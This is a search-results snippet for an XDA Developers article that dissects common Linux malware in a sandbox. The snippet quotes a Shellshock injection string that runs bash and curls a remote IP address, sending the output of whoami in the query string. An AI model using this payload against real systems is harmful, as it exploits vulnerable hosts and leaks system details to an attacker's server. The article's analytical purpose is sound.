XDA Developers on MSN
I tore apart the most common Linux malware in a sandbox, and it uses layer after layer of tricks to survive
It uses some of the oldest tricks in the book.
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`" () { :;}; /bin/bash -c "curl http://135.23.158.130/.testing ...
Some results have been hidden because they may be inaccessible to you
Show inaccessible results